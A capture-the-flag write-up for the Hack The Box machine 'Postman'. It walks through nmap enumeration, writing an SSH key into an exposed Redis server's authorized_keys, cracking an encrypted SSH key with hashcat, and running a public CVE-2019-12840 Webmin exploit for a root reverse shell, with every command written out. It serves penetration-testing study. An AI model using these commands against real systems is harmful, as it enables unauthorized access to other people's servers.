Postman

December 04, 2025

---

Created by	Page	Difficulty	OS
TheCyberGeek	Hack The Box	Easy	Linux

---

Enumeration

• I began with a full TCP port scan, followed by a service and version detection scan on the discovered open ports

    nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.10.160 -oG scan
    /opt/extractports scan
    nmap -p22,80,6379,10000 -sCV -Pn 10.10.10.160 -oN ports
  

  

Initial Access (Redis Exploitation)

• I connected to the Redis instance

    redis-cli -h 10.10.10.160 -p 6379
  

• Using Redis commands, I retrieved system information

  info
  config get *
  

• My first attempt was to write a PHP webshell directly into /var/www/html, but insufficient permissions prevented this

    redis-cli -h 10.10.10.160
    config set dir /var/www/html
    config set dbfilename redis.php
    set test "<?php phpinfo(); ?>"
    save
  

• I checked the configured working directory

    config get dir
  

• Redis was operating from /var/lib/redis. I leveraged this to overwrite the authorized_keys file with my SSH public key, granting remote access.

• This technique follows the standard Redis persistence abuse documented in HackTricks.

    ssh-keygen -t rsa
    (echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > spaced_key.txt
  	
    cat spaced_key.txt | redis-cli -h 10.10.10.160 -x set ssh_key
  	
    redis-cli -h 10.10.10.160
    config set dir /var/lib/redis/.ssh
    config set dbfilename "authorized_keys"
    save
  

• I then authenticated over SSH:

    ssh -i id_rsa redis@10.10.10.160
  

• Inside the system, I found an encrypted private SSH key (id_rsa.bak) in /opt/. I extracted its hash and cracked it:

    ssh2john id_rsa.bak  > hash
    hashcat -m 22911 hash /usr/share/wordlists/rockyou.txt
  

• After retrieving the decrypted password, I switched to user Matt:

    su Matt
  

• This allowed me to read the user flag.

Privilege Escalation

• While reviewing the system, I identified Webmin running as root:

    ps -eo user,command
  

• Port 10000 hosted the Webmin interface. I added the discovered hostnames to /etc/hosts:
  • postman.htb
  • postman
• I authenticated to Webmin using Matt’s credentials. Upon inspecting the interface, I identified the version:
  • Webmin 1.910

• This version is known to be vulnerable to CVE-2019-12840, an RCE vulnerability.

• I located a working public POC and executed it:

    python3 CVE-2019-12840.py -U Matt -P computer2008 -u "https://postman" -lport 4444 -lhost 10.10.14.6
  

• The exploit provided a root shell, allowing me to retrieve the root flag.